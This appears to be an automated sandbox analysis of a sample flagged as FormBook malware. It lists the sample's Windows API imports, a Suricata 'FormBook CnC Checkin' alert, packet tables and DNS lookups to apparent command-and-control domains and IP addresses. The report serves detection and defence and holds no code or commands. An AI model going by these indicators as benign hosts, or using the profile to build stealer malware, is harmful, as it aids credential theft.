RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-01T09:04:00.390735+0200	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.4	49724	13.248.213.45	80	TCP

Network Port Distribution

Total Packets: 152
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2025 09:03:18.231762886 CEST	49723	80	192.168.2.4	144.76.229.203
Apr 1, 2025 09:03:18.413503885 CEST	80	49723	144.76.229.203	192.168.2.4
Apr 1, 2025 09:03:18.413647890 CEST	49723	80	192.168.2.4	144.76.229.203
Apr 1, 2025 09:03:18.423346996 CEST	49723	80	192.168.2.4	144.76.229.203
Apr 1, 2025 09:03:18.599528074 CEST	80	49723	144.76.229.203	192.168.2.4
Apr 1, 2025 09:03:18.600884914 CEST	80	49723	144.76.229.203	192.168.2.4
Apr 1, 2025 09:03:18.600924969 CEST	80	49723	144.76.229.203	192.168.2.4
Apr 1, 2025 09:03:18.601089001 CEST	49723	80	192.168.2.4	144.76.229.203
Apr 1, 2025 09:03:18.605992079 CEST	49723	80	192.168.2.4	144.76.229.203
Apr 1, 2025 09:03:18.792289972 CEST	80	49723	144.76.229.203	192.168.2.4
Apr 1, 2025 09:03:59.168407917 CEST	49724	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:00.182728052 CEST	49724	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:00.277307034 CEST	80	49724	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:00.278023958 CEST	49724	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:00.293005943 CEST	49724	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:00.383843899 CEST	80	49724	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:00.390646935 CEST	80	49724	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:00.390670061 CEST	80	49724	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:00.390734911 CEST	49724	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:00.394443035 CEST	80	49724	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:00.394512892 CEST	49724	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:01.807756901 CEST	49724	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:02.827152014 CEST	49725	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:02.923476934 CEST	80	49725	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:02.924273968 CEST	49725	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:02.938894033 CEST	49725	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:03.026273012 CEST	80	49725	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:03.030935049 CEST	80	49725	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:03.030960083 CEST	80	49725	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:03.031053066 CEST	49725	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:03.040121078 CEST	80	49725	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:03.040189028 CEST	49725	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:04.448566914 CEST	49725	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:05.467688084 CEST	49726	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:05.563896894 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.564058065 CEST	49726	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:05.578892946 CEST	49726	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:05.673835993 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.673855066 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.673917055 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.673930883 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.673943996 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.673957109 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.673970938 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.678824902 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.678839922 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.678927898 CEST	49726	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:05.683953047 CEST	80	49726	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:05.684003115 CEST	49726	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:07.089164972 CEST	49726	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:08.108042955 CEST	49727	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:08.208446980 CEST	80	49727	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:08.208563089 CEST	49727	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:08.217838049 CEST	49727	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:08.316675901 CEST	80	49727	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:08.340334892 CEST	80	49727	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:08.340364933 CEST	80	49727	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:08.340573072 CEST	49727	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:08.343290091 CEST	49727	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:08.347959042 CEST	80	49727	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:08.348023891 CEST	49727	80	192.168.2.4	13.248.213.45
Apr 1, 2025 09:04:08.443607092 CEST	80	49727	13.248.213.45	192.168.2.4
Apr 1, 2025 09:04:13.488854885 CEST	49728	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:13.582381010 CEST	80	49728	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:13.582496881 CEST	49728	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:13.597109079 CEST	49728	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:13.690326929 CEST	80	49728	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:13.975892067 CEST	80	49728	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:13.975910902 CEST	80	49728	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:13.975963116 CEST	49728	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:13.976109028 CEST	80	49728	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:13.976207018 CEST	49728	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:15.104644060 CEST	49728	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:16.124277115 CEST	49729	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:16.222264051 CEST	80	49729	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:16.224154949 CEST	49729	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:16.238420963 CEST	49729	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:16.349490881 CEST	80	49729	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:16.604953051 CEST	80	49729	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:16.605211973 CEST	80	49729	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:16.605264902 CEST	49729	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:16.605612040 CEST	80	49729	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:16.605676889 CEST	49729	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:17.745548964 CEST	49729	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:18.765486956 CEST	49730	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:18.863607883 CEST	80	49730	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:18.863692045 CEST	49730	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:18.881954908 CEST	49730	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:18.979811907 CEST	80	49730	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:18.979849100 CEST	80	49730	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:19.255834103 CEST	80	49730	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:19.255867004 CEST	80	49730	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:19.255975008 CEST	49730	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:19.256028891 CEST	80	49730	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:19.256100893 CEST	49730	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:20.386324883 CEST	49730	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:21.450494051 CEST	49731	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:21.547656059 CEST	80	49731	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:21.547782898 CEST	49731	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:21.556158066 CEST	49731	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:21.651160955 CEST	80	49731	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:21.919503927 CEST	80	49731	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:21.919523001 CEST	80	49731	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:21.919533014 CEST	80	49731	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:21.919622898 CEST	80	49731	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:21.919678926 CEST	49731	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:21.919785976 CEST	49731	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:21.924940109 CEST	49731	80	192.168.2.4	104.21.32.1
Apr 1, 2025 09:04:22.014940977 CEST	80	49731	104.21.32.1	192.168.2.4
Apr 1, 2025 09:04:53.512461901 CEST	49732	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:53.799537897 CEST	80	49732	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:53.806291103 CEST	49732	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:53.818047047 CEST	49732	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:54.121046066 CEST	80	49732	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:54.638560057 CEST	80	49732	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:54.638592005 CEST	80	49732	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:54.638637066 CEST	49732	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:55.323522091 CEST	49732	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:56.342364073 CEST	49733	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:56.629614115 CEST	80	49733	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:56.632196903 CEST	49733	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:56.647674084 CEST	49733	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:56.948592901 CEST	80	49733	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:57.658437014 CEST	80	49733	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:57.658476114 CEST	80	49733	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:57.658587933 CEST	49733	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:58.161710978 CEST	49733	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:59.171161890 CEST	49734	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:59.460505009 CEST	80	49734	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:59.460602045 CEST	49734	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:59.477433920 CEST	49734	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:04:59.768932104 CEST	80	49734	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:59.768991947 CEST	80	49734	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:59.769022942 CEST	80	49734	47.83.1.90	192.168.2.4
Apr 1, 2025 09:04:59.769052982 CEST	80	49734	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:00.518054962 CEST	80	49734	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:00.518084049 CEST	80	49734	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:00.518170118 CEST	49734	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:00.979866028 CEST	49734	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:01.998641014 CEST	49735	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:02.311549902 CEST	80	49735	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:02.314177036 CEST	49735	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:02.323060036 CEST	49735	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:02.617233038 CEST	80	49735	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:03.321115971 CEST	80	49735	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:03.321149111 CEST	80	49735	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:03.321269989 CEST	49735	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:03.355029106 CEST	49735	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:03.653471947 CEST	80	49735	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:16.819154978 CEST	49736	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:17.108165026 CEST	80	49736	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:17.108251095 CEST	49736	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:17.125931978 CEST	49736	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:17.408420086 CEST	80	49736	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:18.088798046 CEST	80	49736	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:18.088856936 CEST	80	49736	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:18.089483023 CEST	49736	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:18.636075974 CEST	49736	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:19.660274982 CEST	49737	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:19.944371939 CEST	80	49737	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:19.944483042 CEST	49737	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:19.959129095 CEST	49737	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:20.251585007 CEST	80	49737	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:20.805785894 CEST	80	49737	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:20.805807114 CEST	80	49737	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:20.805880070 CEST	49737	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:21.464229107 CEST	49737	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:22.483179092 CEST	49738	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:22.771785975 CEST	80	49738	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:22.771876097 CEST	49738	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:22.833292961 CEST	49738	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:23.128701925 CEST	80	49738	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:23.128724098 CEST	80	49738	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:23.797908068 CEST	80	49738	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:23.797920942 CEST	80	49738	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:23.799551010 CEST	49738	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:24.342112064 CEST	49738	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:25.358537912 CEST	49739	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:25.650537968 CEST	80	49739	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:25.650655985 CEST	49739	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:25.659905910 CEST	49739	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:25.942357063 CEST	80	49739	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:26.658189058 CEST	80	49739	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:26.658211946 CEST	80	49739	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:26.658375978 CEST	49739	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:26.662312984 CEST	49739	80	192.168.2.4	47.83.1.90
Apr 1, 2025 09:05:26.961345911 CEST	80	49739	47.83.1.90	192.168.2.4
Apr 1, 2025 09:05:31.926489115 CEST	49740	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:32.096522093 CEST	80	49740	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:32.100218058 CEST	49740	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:32.116102934 CEST	49740	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:32.283509970 CEST	80	49740	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:32.284173012 CEST	49740	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:33.620426893 CEST	49740	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:34.639805079 CEST	49741	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:34.803587914 CEST	80	49741	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:34.803698063 CEST	49741	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:34.821824074 CEST	49741	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:34.999754906 CEST	80	49741	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:34.999847889 CEST	49741	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:36.323579073 CEST	49741	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:37.343415976 CEST	49742	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:37.508555889 CEST	80	49742	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:37.508634090 CEST	49742	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:37.527936935 CEST	49742	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:37.692194939 CEST	80	49742	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:37.692320108 CEST	80	49742	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:37.692370892 CEST	49742	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:39.044867039 CEST	49742	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:40.061067104 CEST	49743	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:40.240211010 CEST	80	49743	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:40.240428925 CEST	49743	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:40.252130985 CEST	49743	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:40.421483994 CEST	80	49743	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:40.424222946 CEST	49743	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:40.427191019 CEST	49743	80	192.168.2.4	162.218.30.235
Apr 1, 2025 09:05:40.590544939 CEST	80	49743	162.218.30.235	192.168.2.4
Apr 1, 2025 09:05:45.627563000 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:05:46.755150080 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:05:48.807928085 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:05:52.892647028 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:00.901710033 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:07.983736038 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:09.078090906 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:11.095854044 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:15.198625088 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:23.198633909 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:30.233912945 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:31.266379118 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:33.275823116 CEST	49744	80	192.168.2.4	194.9.94.85
Apr 1, 2025 09:06:37.293139935 CEST	49744	80	192.168.2.4	194.9.94.85

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 1, 2025 09:03:11.410608053 CEST	53	53086	162.159.36.2	192.168.2.4
Apr 1, 2025 09:03:17.952788115 CEST	53117	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:18.225131035 CEST	53	53117	1.1.1.1	192.168.2.4
Apr 1, 2025 09:03:33.655392885 CEST	51091	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:34.691181898 CEST	51091	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:35.685921907 CEST	51091	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:37.698370934 CEST	51091	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:41.698461056 CEST	51091	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:45.714806080 CEST	60326	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:45.803064108 CEST	53	60326	1.1.1.1	192.168.2.4
Apr 1, 2025 09:03:46.731940985 CEST	65157	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:47.729831934 CEST	65157	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:48.745316029 CEST	65157	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:50.745239973 CEST	65157	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:51.849114895 CEST	53	65157	1.1.1.1	192.168.2.4
Apr 1, 2025 09:03:51.849191904 CEST	53	65157	1.1.1.1	192.168.2.4
Apr 1, 2025 09:03:52.856453896 CEST	52914	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:52.957776070 CEST	53	52914	1.1.1.1	192.168.2.4
Apr 1, 2025 09:03:59.018047094 CEST	57195	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:03:59.165592909 CEST	53	57195	1.1.1.1	192.168.2.4
Apr 1, 2025 09:04:13.358824968 CEST	55058	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:04:13.486046076 CEST	53	55058	1.1.1.1	192.168.2.4
Apr 1, 2025 09:04:26.945852041 CEST	52921	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:04:27.948574066 CEST	52921	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:04:28.039468050 CEST	53	52921	1.1.1.1	192.168.2.4
Apr 1, 2025 09:04:36.092961073 CEST	52843	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:04:37.089287043 CEST	52843	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:04:37.178788900 CEST	53	52843	1.1.1.1	192.168.2.4
Apr 1, 2025 09:04:45.242784023 CEST	63778	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:04:45.339003086 CEST	53	63778	1.1.1.1	192.168.2.4
Apr 1, 2025 09:04:53.407294035 CEST	61363	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:04:53.507210970 CEST	53	61363	1.1.1.1	192.168.2.4
Apr 1, 2025 09:05:08.374314070 CEST	52231	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:05:08.502291918 CEST	53	52231	1.1.1.1	192.168.2.4
Apr 1, 2025 09:05:16.562122107 CEST	58186	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:05:16.816375017 CEST	53	58186	1.1.1.1	192.168.2.4
Apr 1, 2025 09:05:31.671436071 CEST	59259	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:05:31.922574997 CEST	53	59259	1.1.1.1	192.168.2.4
Apr 1, 2025 09:05:45.436824083 CEST	62182	53	192.168.2.4	1.1.1.1
Apr 1, 2025 09:05:45.624501944 CEST	53	62182	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 1, 2025 09:03:17.952788115 CEST	192.168.2.4	1.1.1.1	0x89f7	Standard query (0)	www.031233226.xyz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:33.655392885 CEST	192.168.2.4	1.1.1.1	0xc12e	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:34.691181898 CEST	192.168.2.4	1.1.1.1	0xc12e	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:35.685921907 CEST	192.168.2.4	1.1.1.1	0xc12e	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:37.698370934 CEST	192.168.2.4	1.1.1.1	0xc12e	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:41.698461056 CEST	192.168.2.4	1.1.1.1	0xc12e	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:45.714806080 CEST	192.168.2.4	1.1.1.1	0xc690	Standard query (0)	www.031233226.xyz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:46.731940985 CEST	192.168.2.4	1.1.1.1	0xb676	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:47.729831934 CEST	192.168.2.4	1.1.1.1	0xb676	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:48.745316029 CEST	192.168.2.4	1.1.1.1	0xb676	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
Apr 1, 2025 09:03:50.745239973 CEST	192.168.2.4	1.1.1.1	0xb676	Standard query (0)	www.vipstargold.buzz	A (IP address)	IN (0x0001)	false
